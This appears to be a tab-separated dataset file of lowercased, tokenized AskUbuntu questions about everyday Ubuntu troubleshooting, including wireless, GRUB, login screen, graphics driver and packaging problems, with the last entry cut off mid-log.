114261	ca n't enable wireless lan on fujitsu siemens a1665g with ubuntu 11.10 installed	i saw my old notebook yesterday and wanted to make that work again . on windows xp the wireless worked still fine . then i installed new ubuntu 11.10 32bit and i 'm sadly not able to make the wireless enabled . [ i replaced win xp entirely ] lspci lists following network : 08:0a.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) so after recommendation from this link i installed the b43 firmware module . iwconfig prints the following : wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associatd tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off as you can see , my wireless lan adapter is not turned on . sudo iwconfig wlan0 txpower auto does n't change anything . then i tried to make it work with rfkill . rfkill list 0 : phy0 : wirless lan soft blocked : no hard blocked : yes sudo rfkill unblock all rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes remains the same . the question is now , how i could enable the hard blocked wireless lan . there is no hardware switch for wlan integrated . however there is a button to change the state . i always thought this would be software sided , but it seems to make some hardware changes as well ... the wireless led is also not blinking ( as it did on windows xp ) i reset bios and searched for some settings in there , but it has only a few options and nothing to do with wireless settings , nothing works here.. at last i tried to install the acer hotkeys but i was not able to manage that . i installed the acerhkgui package , but in initializing progress , it was not able to compile acer hotkeys for my machine . there was a message that asm/linkage.h was not found while compiling . do you have any ideas what i could do to make this hard blocked stuff disabled and my wireless card work ? ps : i also tried sudo rm /dev/rfkill and a reboot to reinit that stuff ... no success : (
114263	what word processor can manage left and right pages separately ?	i was after a word processor that can manage left and right pages separately so i can have my text on the right pages and my illustrations on the left pages . i know libeoffice can set `` left page '' and `` right page '' formats , but there is no simple way to make the text jump from right page to right page when writing . i do n't know what would be the best way to do that , but i guess i need an app that is designed for writing books and do that kind of thing , or an app that can associate a page format with an object format ( so the `` illustration '' format can be exclusively associated with `` left page '' format , and `` text body '' exclusively associated with `` right page '' , for example ) . or is there an extension for lo or ooo out there that i did n't hear about ? cheers !
114264	what are the significant differences between tracepath and traceroute ?	i recently read a bit of an article on howtogeek that has me scratching my head a little . i 've got fairly little experience with linux though , so forgive me if this is entry-level : '' the tracepath command is similar to traceroute , but it doesnât require root privileges . '' http : //www.howtogeek.com/108511/how-to-work-with-the-network-from-the-linux-terminal-11-commands-you-need-to-know/ how do traceroute and tracepath perform a similar function , differently ? what does traceroute do , which requires root privileges , that tracepath does n't ? are there scenarios where one should prefer tracepath over traceroute , or vice-versa ?
114265	wrong memory info for ati radeon video card with `lspci -v` command ?	could someone help me read this information better , i am suspicious of this line : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] my video card is supposed to have 1gb of memory , however i 'm not sure if this output reflects that or if i 'm looking at the wrong thing ? 01:00.0 vga compatible controller : ati technologies inc cypress [ radeon hd 5800 series ] ( prog-if 00 [ vga controller ] ) subsystem : ati technologies inc device 0b00 flags : bus master , fast devsel , latency 0 , irq 44 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbee0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at d000 [ size=256 ] expansion rom at fbec0000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > capabilities : [ 150 ] advanced error reporting kernel driver in use : fglrx_pci kernel modules : fglrx , radeon
114267	software center wo n't start	for a few days now , my ubuntu software center wo n't start . ubuntu one also wo n't connect ( not sure if that 's related ) . when i try launching software center from dash , nothing happens . if i try running 'software-center ' from terminal , i get this error message : 2012-03-19 10:26:43,316 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 149 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 82 , in < module > from softwarecenter.ui.gtk3.panes.installedpane import installedpane file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/installedpane.py '' , line 43 , in < module > from softwarecenter.backend.oneconfhandler import get_oneconf_handler file `` /usr/share/software-center/softwarecenter/backend/oneconfhandler.py '' , line 25 , in < module > from softwarecenter.backend.restfulclient import get_ubuntu_sso_backend file `` /usr/share/software-center/softwarecenter/backend/restfulclient.py '' , line 36 , in < module > from lazr.restfulclient.resource import serviceroot importerror : no module named restfulclient.resource i 'm running ubuntu 11.10 amd64 edit : it started happening after i install all the dependencies needed to setup an environment to work on the ubuntu summit website . i 'm assuming something i installed must not have played nice with the rest of my system .
114271	exporting markdown + css to pdf	i 'm in need of an application that can do something like marked for os x does . the function i need is a bit more specific : i want the app to export markdown to pdf , but using css - i 've achieved this using bbedit ( using < link rel= '' stylesheet '' href= '' file.css '' / > and exporting , and with marked , i can just select the css file . i 'm using retext for markdown editing , but said method does n't work - the pdf exportation is posible , but without styling . any way to achieve this ? i do n't mind using the terminal or any library lying around - if i can achieve the desired results .
114273	temporary r+w cifs share for non-root accounts ?	i want to set up a cross platform mail client ( thunderbird ) , and so far i want to use nas as a profile store . the nas is cifs based , and can be mounted on both windows and ubuntu . also the locking works fine for mutex , and setup seems to work as a proof of concept . the problem is the linux mount . since i 'm using a laptop , i 'm not always connected to network , hence , i ca n't use the /etc/fstab to set up cifs share with a modified group id . and the share has to be mounted using mount -t cifs ... , which causes it to be owned by root , and owned so badly , that it ca n't be chowned to the regular user account . this causes read only issues for thunderbird , which seem to be solved if thunderbird is launched via sudo . but i would like to avoid that and use a script to mount the share on-demand to a profile location , with profile based privileges and access rights . is there a way to achieve that ?
114277	ubuntu does n't boot without flash drive	i just installed ubuntu 11.04 on my netbook . i had to use a flash key and during the installation i tried putting ubuntu on a separate partition , but it kept showing a no root file system is defined error . i did n't really know what i could do to fix it , so i decided to install it alongside windows . i have a windows7 installation , which works perfectly fine . so the installation goes through perfectly and i give both os 's 40 gigs of space . the comp restarts and nothing ! the computer boots directly into windows . during the install it said i am supposed to be prompted at boot , and nothing happened . ubuntu partitioned the c : drive , but this partition does n't show up in windows . if i boot using the flash drive , it shows the partition with the ubuntu installation . i tried reinstalling , but now i do n't get the prompt to asking me to install ubuntu . really confused ..
114280	what is mark shuttleworth 's `` easter eggs '' blog a reference to ?	i saw this blog post today , and i was wondering if there 's some meaning within the ubuntu community that i 've missed ? ( i know what an easter egg is in a computer context . ) one of our ducks has started dropping eggs in random locations in the garden . i don’t know which duck , but i assume it’s one of the new females we took in from the spca , who hasn’t figured out “nesting” yet . i do love ‘em but they’re not african grey’s in the iq department . anyhow , i think i finally understand why people hide eggs in the garden at easter . because ducks used to do it for them ! i suppose , for millennia , this has been the season to go hunting for eggs . now we just substitute chocolate ones instead . for the moment , i’ve kept them in a cool shady spot while i keep an eye out for an actual nest . if a polecat doesn’t find them first , i may be able to slip them onto the nest in time for them to get hatched along with some cousins .
114284	installing multiple ubuntu partitions on same machine without corrupting grub	i had only ubuntu installed on my pc , but i felt like adding another ubuntu ( same version ) partition so i could have one just for work/study and another one just for personal generic use . i installed it and it worked out okay , but i found i needed more space on the new created ubuntu partition , so i booted up from the live cd , and used gparted to move/shrink/grow the partitions as the ubuntu 's tutorials suggested it was pretty straightforward . but in doing all this i messed up with grub , so when i start my system it shows : error : unknow filesystem grub rescue > what would be the easiest way to recover it so i could have both partitions working ? btw , it would n't be a problem for me to lose the partitions if it 's the shortest/easiest way . thanks in advance . ok , so i tried all the grub rescue 's commands which were listed here ( https : //help.ubuntu.com/community/grub2 ) , none of them worked . also , when i entered 'ls ' , it would list several ( hd0 , msdosx ) instead of several ( hd0 , x ) . all the ubuntu 's partitions are inside an extended one . if i delete this partition and overwrite it with a new ext4 partition , using the livecd , and then use it to install ubuntu , would it fix grub ?
114285	how to install ubuntu server 11.10 with sata-raid on fujitsu-siemens primergy tx150 s7 server ?	i have fsc primergy tx150 s7 and i need two sata drives to be in soft-raid mode . i want to install ubuntu server 11.10 on this machine . but when i run installation , i ca n't see any disks when raid mode is enabled in bios . are there any drivers needed for this to work ? can anybody give me a hint ? thank you in advance . server has chipset intel速 3420 ibex peak .
114288	i 've had tomboy twice delete a single important note . what 's going on there ?	not sure what 's going on here , but here 's the best i can describe : i use tomboy extensively , for notes , collecting throw-away passwords , etc . once a couple of months ago , a very important note just disappeared . no reference to the title , no deleting , no way of tracking it down -- -it was just like it had never existed . the same thing just happened today . i think the note in question was actually open when i rebooted , so maybe that 's related . has anyone else encountered something similar ? edit : happened 3 times seems to be the last note i have open when shutting down ( which is usually the most important ) is deleted without a trace .
114293	stream vob files from dvd rips over my network	ive got some ripped dvd 's in vob format on my server . i want to stream these to another device i.e . another pc with vlc across my network . how ?
114303	how-to limit user-names in lightdm login-screen when accountsservice is used	i have several `` user '' names in passwd that do n't represent real people , and that should not appear on the lightdm login-screen . the lightdm-gtk-greeter configuration file clearly says that if accountsservice is installed , the program uses that and ignores its owh configureation files . however , there is less than nothing for documentation about how to configure accountsservice ! please , can someone tell me how to configure the system so that only an explicitly specified group of users are shown on the greeter ? i could uninstall accountsservice . i did that before , but it comes back ( dependencies , i suppose ) . tia
114304	how to modify another user 's .profile from the recovery console ?	pretty much everything is in the title , really ! ; ) i installed a few components to compile go programs , and the last step was to add the go directory to the path . being a total ubuntu noob , i added the line path= '' path/to/folder '' , after the one that was already there . after the first reboot i can no longer log into ubuntu ( the screen black-out for a while and then i 'm back to the login screen , and the same chime greets me . ) i 've been able to boot in recovery mode , open the root 's profile with vi , but i cant find my other user 's profile , nor pretty much anything.. any hint would be greatly appreciated ! pascal
114305	create text tattoo in gimp	is there a way to append a tattoo on somebody 's arm in gimp ? the tattoo will not be an image but writing from a text tool with some nice font ( or another fast way ) . so , i need to create a fitting effect from this writing . i already found how to do a tattoo from images but it would be slow for me to create an image from every writing . i need to do many fitting writings like in memento movie .
114306	low timeout threshold for double-click mouse event	lately my mouse is misbehaving and from time to time a double click event is received when what i mean is a single click . given that there 's a configuration to set the timeout by which two separate single clicks are joined together as a double click , i was wondering if it 's possible to do the opposite , that is , discard a double click when the two single clicks happened before a timeout .
114309	symbolic link all files in directory to show in another directory ?	what i want is to be able to display all files that are ftp 'd into /home/ftp in /srv/ftp /srv/ftp is password protected , and has files in it which i do n't want to be accessible from the public ftp . so as such i wish that all files uploaded to /home/ftp are automatically symbolically linked ( or otherwise ) to /srv/ftp . does this make sense ? e.g . ls /srv/ftp : file.sh another.txt something_else.i386 then a user ftp 's and drops a file in /home/ftp ( or ssh , or whatever ) ls /home/ftp : user_file.mk ls /srv/ftp : file.sh another.txt something_else.i386 user_file.mk i hope this makes sense . i have been told that this can probably be achieved using ln to create symbolic links , but i do n't want to have to ssh in and create the links every time i ( or someone else ) puts files over ftp . thanks ! : )
114312	installed 4gb memory . bios sees 4 gb . ubuntu sees only 3gb . why , and how can i make it see 4 gb ?	on 3 19 2012 i installed 4 gb of memory on my 32 bit pc , which is the maximum memory that my motherboard will except . when i checked the bios it showed 4 gb . when i went into ubuntu 11.10 and looked at the memory settings , it showed 3 gb . how can i get ubuntu 11.10 to see all 4 gb of memory . thanks
114318	error while doing sudo apt-get update	i always get the following errors when i do sudo apt-get update . how do i fix them ? w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ oneiric/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems
114322	pptp vpn server	i have followed this guide and also the documentation for pptp vpn and my vpn connects . it even allows me to go on the web and search it . however , when i go to cmyip.com ; it displays my personal ip ( as if the vpn is not connected ) i have other vpns ( i used ddwrt pptp ) and it displays the ip address of the vpn server im connected to ? let me know how i can fix this . same issue as here and it remains un answered .
114324	how to kill synergy/evict all connections	i install synergy on my ubuntu computer to use as server ( kbd and mouse are plugged into it ) . i install synergy on winpc to use as client . everything is great until i need to reboot winpc ( as is so common with those win pc 's ) . now synergy says warning : failed to connect to server : server already has a connected client with our name . if i quit synergy on the ubuntu machine and reopen it this error does not go away . i have two solutions . one : rename the windows computer and reboot it ( unacceptable ) . two : reboot ubuntu computer ( completely unacceptable ) . why is synergy persisting a dead connection even after i close and reopen it ? px ax | grep synergy only returns the running grep . how do i fix this without rebooting either computer ? is synergy hiding under some other name , or does it leave files laying around i can delete ?
114325	unmet dependency error while installing cinnamon	i added the required ppa for cinnamon . now when i run sudo apt-get install cinnamon , i get the unmet dependencies error . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libcogl5 ( > = 1.7.4 ) but it is not going to be installed depends : libmuffin0 ( > = 1.0.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . any suggestions ?
114334	ca n't print on my brand new canon pixma mp495	i just purchased a canon pixma mp495 . it was working perfect , except for the scanner . it wo n't install the driver for the scanner . anyway , i was printing using the new printer . after a while , it started saying that the printing job was sent to the printer and then that the print job was completed . but , nothing came out of the printer . i uninstalled the driver and installed it over again . nothing . can somebody help me out . ca n't work without a printer . thanks in advance .
114336	why does ubuntu keep trying to connect to a wifi network while plugged into an ethernet	my desk is situated at the edge of the range of a wireless signal which i use occasionally ( when away from my desk ) and is therefore saved in network manager . at my desk , however , i plug into the ethernet cable . while i 'm working the computer is constantly trying to join the wireless network and usually failing this results in two annoying behaviors . 1 : in gnome shell the network connect and disconnect notices keep popping up at the bottom of the screen and i have to click them to make them disappear ( i assume it 's been fixed in the next version of gnome ) . 2 : ( the worst ! ) occasionally the wifi password dialog will pop up and ask for the password to this network ( which is already saved ) . an additionally annoyance is that in gnome shell i 'll get two copies of the dialog that i have to cancel , one is gnome shell themed ( no window border etc ... ) and the other is just normal gnome themed . ( sometimes if i 've been away from the computer for a while i will have multiple copies of this dialog up as its been trying to connect for a while resulting in at times 20 dialogs to cancel ) . note , all the while i 've been happily connected to the ethernet and have full network access . this is incredibly annoying and distracting , why does n't ubuntu stop trying to connect to wifi if i 'm on the ethernet ( unless i want to broadcast my own network , but that 's different ) ?
114343	estimating compressed file size using a list parameter	i am currently compressing a list of files from a directory in the following format : tar -cvjf test_1.tar.gz -t test_1.lst -- no-recursion the above command will compress only those files mentioned in the list . i am doing this because this list is generated such that it fits a dvd . however , during compression the compression rate decreases the estimated file size and there is abundant space left in the dvd . this is something like a knapsack algorithm . i would like to estimate the compressed file size and add some more files to the list . i found that it is possible to estimate file size using the following command : tar -cjf - folder/ | wc -c this command does not take a list parameter . is there a way to estimate compressed file size ? i am also looking into options like perl scripts etc .
114349	when i create an account without password , ubuntu still asks for it !	that is the problem . when i create an account without password ( or disable the password on an account that has ) , when i try to install softwares or when i log out the account , it asks for password.. if i type the old password , it says : `` invalid password '' and isnt possible to do anything on ubuntu.. im using ubuntu 11.10 ! a long time ago i had to format and reinstall ubuntu because i disable my account . now , i have my root account with pass , but the problem still exists when i create other account . is there a way to fix that ? ?
114368	kubuntu 11.10 disable tapclick not working from gui	trying to find the script that disables tap-to-click , but ca n't locate the right settings . here is 50-synaptic.conf : # example xorg.conf.d snippet that assigns the touchpad driver # to all touchpads . see xorg.conf.d ( 5 ) for more information on # inputclass . # do not edit this file , your distribution will likely overwrite # it when updating . copy ( and rename ) this file into # /etc/x11/xorg.conf.d first . # additional options may be added in the form of # option `` optionname '' `` value '' # section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' # this option is recommend on all linux systems using evdev , but can not be # enabled by default . see the following link for details : # http : //who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html matchdevicepath `` /dev/input/event* '' endsection any ideas would be gratefully received , it 's driving me mad !
114371	thinkpad brightness steps error using fn+home/end	i 've met the following problem : normally my t400 ( lenovo thinkpad ) has 16 steps of brightness , and windows utilizes it correctly . after a fresh install & minor tweaks mint 12 ( which is based on 11.10 ubuntu ) i only had 6 steps which was way to few . listing /sys/class/backlight showed 3 entried . i removed the acpi-tools package , one of the disapperared - and i now have 10 steps ! therefore i think if i can reduce the entries to 1 i 'm going to have 16 steps , since the stepping will be 1 instead of 2 ( or 3 ) . /sys/class/backlight/ intel_backlight - > ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-lvds-1/intel_backlight thinkpad_screen - > ../../devices/virtual/backlight/thinkpad_screen the problem is that i 'm unable to trace back what are the configs / daemons / kernel options triggers these two . more strangely , i discovered a strange behaviour . i monitored watch -n1 `` cat /sys/class/backlight/thinkpad_screen/actual_brightness '' and watch -n1 `` cat /sys/class/backlight/intel_backlight/actual_brightness '' while changing the brightness with fn+home/end combinations from max to min . the outcome is the following : brighness intel thinkpad -- -- -- -- - -- -- - -- -- -- -- max 2408475 7 | 1955115 5 | 1435640 3 | 1246740 1 | 1086175 0 | 1010615 6 | 859495 4 | 689485 2 v 481695 0 min 217235 0 brighness intel thinkpad -- -- -- -- - -- -- - -- -- -- -- min 217235 0 | 481695 2 | 689485 4 | 859495 6 | 1010615 7 | 1086175 1 | 1246740 3 | 1435640 5 v 1955115 7 max 2408475 0 when stepping from min to max , there 's no difference between the last 2 steps . also , the osd icon ( cinnamon desktop , default theme ) goes from full to min in 4 steps and from full to min once again in 4 steps . so ... it seems that the intel entry is working correctly , showing correct values . the thinkpad entry however twists the things and even showing incorrect values . does anyone have any idea how to get rid of the thinkpad entry ? system data : linux mint 12 3.0.0-16 kernel lenovo thinkpad t400 cinnamon 1.4 desktop for any additional info , please tell me what do you need . edit i 'm sorry , i forgot to mention , i added acpi_backlight=vendor to grub cmdline as well , this is the result of the semi-better working than the default .
114375	dell e2009w monitor not detected	i have an issue with my monitor . i just installed ubuntu 11.10 , but the monitor that is plugged in does n't appear anywhere . and by does n't appear , i mean that in the `` displays '' menu , it does n't even appear as `` unknown '' , i just have my screen that appears and nothing else . it is connected through vga , and the monitor is recognized with no problem on windows 7 . it is a dell monitor . i 'm not a pro with ubuntu , so any help to diagnose the issue would be really helpful ( and help me learn how to fix this kind of monitor issue in the future ) thanks !
114377	would it be possible to minimize current window with hotkey super+ < number_of_window_in_launcher > ?	i 've been searching about this feature and i did n't found anything . for me is quite intuitive this combo . if you can rise an application from his launcher shortcut , why do n't do the same to minimize it ? as far as i know i have to conform myself with alt+f9 ...
114378	ubuntu 10.04 , i can not get my computer to connect to the internet	so at first i was unable to get my belkin surf & share usb to install on my computer , so then i plugged my computer directly into my router and my computer wo n't acknowledge any connection . i know very little about how to use ubuntu , please help me . what i do know is : i 'm using ubuntu 10.04 lucid lynx in my 'edit connections ' , i go into 'wired ' tab , select `` wired connection 1 '' then 'edit ' it brings up 4 tab options : wired ( i input the mac address that 's printed on the bottom of my router , mtu is set to automatic ) 802.1x security ( currently : not checked ) ipv4 settings ( currently : automatic ( dhcp ) addresses only ) ipv6 settings ( currently : automatic )
114380	what changes were made that resulted in gtk3 themes broken ?	i 'm not sure if this a bug as i did n't found anything conclusive , most themes are broken in gnome 3.3.91 and had been broken ever since gnome 3.3 , however i see that the ambiance and radiance themes are not ? . what changes were made that only those themes are looking fine but the rest are n't ? note : this is n't exclusive to 12.04 i must add , this happens in 11.10 if one adds the gnome 3 ppa .
114383	how to fix a terminal not responding to input ?	terminal wo n't input password when i/it asks for it . i am trying to install wine through terminal . enter still works and it goes to next line to run a command as administrator ( user `` root '' ) , by using the sudo command . see `` man sudo_root '' for details . d @ d-dimension-8400 : ~ $ `sudo apt-get install wine` [ sudo ] password for d : sorry , try again . [ sudo ] password for d : sorry , try again . [ sudo ] password for d : sorry , try again . sudo : 3 incorrect password attempts thanks
114384	how to install chromium .zip file ?	i have the zip file but i do n't know to install it from a .zip file . here are the contents of the extracted chrome-linux.zip file :
114386	cat a command to file	my bash script does many things , among which creating another script . i would like to have the following line to be executed from within a script . but it does not work ( grep is executed instead of pasted in search.sh ) . what am i doing wrong ? cat `` grep -- ignore-case $ 1 *.find '' > search.sh
114394	convert ps to pdf	how do i convert *.ps file to a .pdf file ? i tried several links given by google search , but either solution is really old and does not work for latest versions of ps and pdf files , or they do not make sense to me . is there a simple utility to convert .ps file to .pdf file .
114397	sketchy textboxes over text	i have a problem with my ubuntu 11.10 ( up to date ) running on laptop with the graphic card ati radeon x1200 with the ( i think edgers driver since i updated it because of the lag i had ) it shows some weird sketchy boxes over any text i open , it 's confusing me and i do n't know how to fix it.. anyone can help ? !
114401	list installed programs to text file	i would like to list all installed programs to a text file , in case my old ticker does n't hold up much longer . is there anyway this can be done ? i saw this link here but not sure if its want i need or not .
114405	what does 'use opengl ' do under unity 2d ?	in dconf , schema com.canonical.unity2d has a key named 'use-opengl ' . under description it says 'whether to render the graphics into an opengl viewport ' . but does it make any changes on how the desktop looks , or is it just a performance matter ?
114406	graphics system failure	i just upgraded two versions of ubuntu to oneiric after a recent set of updates broke audacious 2.4.something in maverick for me . when it was all finished my asus eee 1215n with the 1366x768 screen and the notoriously unsupported nvidia ion2 with optimus chipset was working on minimum compatibility fallbacks at 1024x768 resolution ( probably on only the intel part ) . so i did a little bit of reading ( not enough ) and tried deleting a couple parts of the graphics system to see if i could force a retry on the autodetection . the result : no graphical shell works now . attempted so far : -reinstalling xorg/nouveau drivers , did n't work but perhaps i read the wrong instructions . -installing bumblebee/nvidia-current ( followed the directions ) , did n't work . -sudo dpkg-reconfigure -phigh -a , it did n't take as long as it probably should have but did n't work . right now i 'm looking at what it takes to disable the splash screens , which do still work , so that i can hopefully diagnose my error messages ; if someone knows where this stuff goes as a boot-log that would be awesome to know . this is otherwise a functional installation that i had spent some time setting up already ( including a successful compile of audacious 3.21 that was working with all the plugins ) . is there a way for me to rebuild the graphics system from scratch or should i just give up , cry a little , backup data , wipe partition and reinstall with a usb drive ? user lekensteyn is probably hitting the nail on the head about me stepping on the mrmeee/bumblebee landmine ; several months ago ( a year ? after he 'd fixed the rm -r -f /usr bug ) i tried installing that mess but it never seemed to do what it was supposed to so i removed it . it 's entirely possible that i did n't manage to shovel all of that pile off my system . http : //paste.ubuntu.com/892799/ -- xorg.0.log managed to suppress splash pages a little bit , using steps 1-4 of instructions found here : http : //www.techienote.com/2012/01/disable-gui-boot-in-ubuntu-11-10.html saw a couple errors that make it possible to start diagnosing , [ 14.645074 ] [ drm : intel_dsm_platform-mx_info ] *error* mux info call failed [ 14.645266 ] [ drm : intel_dsm_platform-mx_info ] *error* mux info call failed also , when i try to use startx it complains : no protocol specified
114407	how do i crop from the default image viewer ?	i recall an `` edit image '' button in 11.04 that would bring up a second window with a `` crop '' button easily visible . but now , in 11.10 , i see no such button . in fact , i ca n't find a way to crop at all from the default image viewer . how can i crop an image from the default image viewer ?
114410	can not log in to the desktop on ubuntu 11.10 ?	the problem is , i could log in under the terminal , i could ifup eth0 , i could do anything i want in the terminal , but if i use ctrl+alt+f7 goto the gnome login screen , after i input the correct password , the system just send me back to same login screen again . i have created a new user , but it did n't work . i have change all the files under ~/ to jichao : jichao ( which is my username ) with chown -hr jichao : jichao /home/jichao , but it did n't work too . i searched the internet , somebody said i should see the logs under /var/log/gdm , but there is not a /var/log/gdm directory in my box . here are the tail of files under /var/log/ tail x.org.log [ 3263.348 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 3263.348 ] ( ** ) dell dell usb keyboard : always reports core events [ 3263.348 ] ( ** ) dell dell usb keyboard : device : `` /dev/input/event5 '' [ 3263.348 ] ( -- ) dell dell usb keyboard : found keys [ 3263.348 ] ( ii ) dell dell usb keyboard : configuring as keyboard [ 3263.348 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input29/event5 '' [ 3263.348 ] ( ii ) xinput : adding extended input device `` dell dell usb keyboard '' ( type : keyboard ) [ 3263.348 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 3263.348 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 3263.348 ] ( ** ) option `` xkb_layout '' `` us '' kern.log mar 20 09:32:58 jichao-ms-730 kernel : [ 3182.701247 ] input : dell dell usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input27 mar 20 09:32:58 jichao-ms-730 kernel : [ 3182.701392 ] generic-usb 0003:413c:2003.0018 : input , hidraw1 : usb hid v1.10 keyboard [ dell dell usb keyboard ] on usb-0000:00:1d.0-1.4/input0 mar 20 09:33:02 jichao-ms-730 kernel : [ 3186.642572 ] usb 2-1.3 : new low speed usb device number 17 using ehci_hcd mar 20 09:33:02 jichao-ms-730 kernel : [ 3186.741892 ] input : microsoft microsoft 5-button mouse with intellieye ( tm ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/input/input28 mar 20 09:33:02 jichao-ms-730 kernel : [ 3186.742080 ] generic-usb 0003:045e:0047.0019 : input , hidraw2 : usb hid v1.10 mouse [ microsoft microsoft 5-button mouse with intellieye ( tm ) ] on usb-0000:00:1d.0-1.3/input0 mar 20 09:33:27 jichao-ms-730 kernel : [ 3212.473901 ] usb 2-1.3 : usb disconnect , device number 17 mar 20 09:33:28 jichao-ms-730 kernel : [ 3212.702031 ] usb 2-1.4 : usb disconnect , device number 16 mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.022655 ] usb 2-1.4 : new low speed usb device number 18 using ehci_hcd mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.124278 ] input : dell dell usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input29 mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.124423 ] generic-usb 0003:413c:2003.001a : input , hidraw1 : usb hid v1.10 keyboard [ dell dell usb keyboard ] on usb-0000:00:1d.0-1.4/input0 mar 20 09:33:02 jichao-ms-730 kernel : [ 3186.741892 ] input : microsoft microsoft 5-button mouse with intellieye ( tm ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/input/input28 mar 20 09:33:02 jichao-ms-730 kernel : [ 3186.742080 ] generic-usb 0003:045e:0047.0019 : input , hidraw2 : usb hid v1.10 mouse [ microsoft microsoft 5-button mouse with intellieye ( tm ) ] on usb-0000:00:1d.0-1.3/input0 syslog mar 20 09:33:02 jichao-ms-730 mtp-probe : bus : 2 , device : 17 was not an mtp device mar 20 09:33:27 jichao-ms-730 kernel : [ 3212.473901 ] usb 2-1.3 : usb disconnect , device number 17 mar 20 09:33:28 jichao-ms-730 kernel : [ 3212.702031 ] usb 2-1.4 : usb disconnect , device number 16 mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.022655 ] usb 2-1.4 : new low speed usb device number 18 using ehci_hcd mar 20 09:34:08 jichao-ms-730 mtp-probe : checking bus 2 , device 18 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4 '' mar 20 09:34:08 jichao-ms-730 mtp-probe : bus : 2 , device : 18 was not an mtp device mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.124278 ] input : dell dell usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input29 mar 20 09:34:08 jichao-ms-730 kernel : [ 3253.124423 ] generic-usb 0003:413c:2003.001a : input , hidraw1 : usb hid v1.10 keyboard [ dell dell usb keyboard ] on usb-0000:00:1d.0-1.4/input0 auth.log mar 20 09:18:52 jichao-ms-730 lightdm : pam_ck_connector ( lightdm-autologin : session ) : nox11 mode , ignoring pam_tty :0 mar 20 09:18:53 jichao-ms-730 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` jichao '' mar 20 09:18:53 jichao-ms-730 dbus [ 835 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.240 '' ( uid=104 pid=6457 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.11 '' ( uid=0 pid=1156 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) mar 20 09:19:38 jichao-ms-730 sudo : jichao : tty=tty6 ; pwd=/home ; user=root ; command=/bin/chown -hr jichao : jichao jicha mar 20 09:19:39 jichao-ms-730 sudo : jichao : tty=tty6 ; pwd=/home ; user=root ; command=/bin/chown -hr jichao : jichao jichao mar 20 09:20:10 jichao-ms-730 lightdm : pam_unix ( lightdm-autologin : session ) : session closed for user lightdm mar 20 09:20:11 jichao-ms-730 lightdm : pam_unix ( lightdm-autologin : session ) : session opened for user lightdm by ( uid=0 ) mar 20 09:20:11 jichao-ms-730 lightdm : pam_ck_connector ( lightdm-autologin : session ) : nox11 mode , ignoring pam_tty :0 mar 20 09:20:12 jichao-ms-730 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` jichao '' mar 20 09:20:12 jichao-ms-730 dbus [ 835 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.247 '' ( uid=104 pid=6572 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.11 '' ( uid=0 pid=1156 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) it seems that my .xsession-errors does not grow since yesterday . here is my .xsession-error : ( gnome-settings-daemon:1550 ) : gdk-warning ** : the program 'gnome-settings-daemon ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 26702 error_code 3 request_code 2 minor_code 0 ) ( note to programmers : normally , x errors 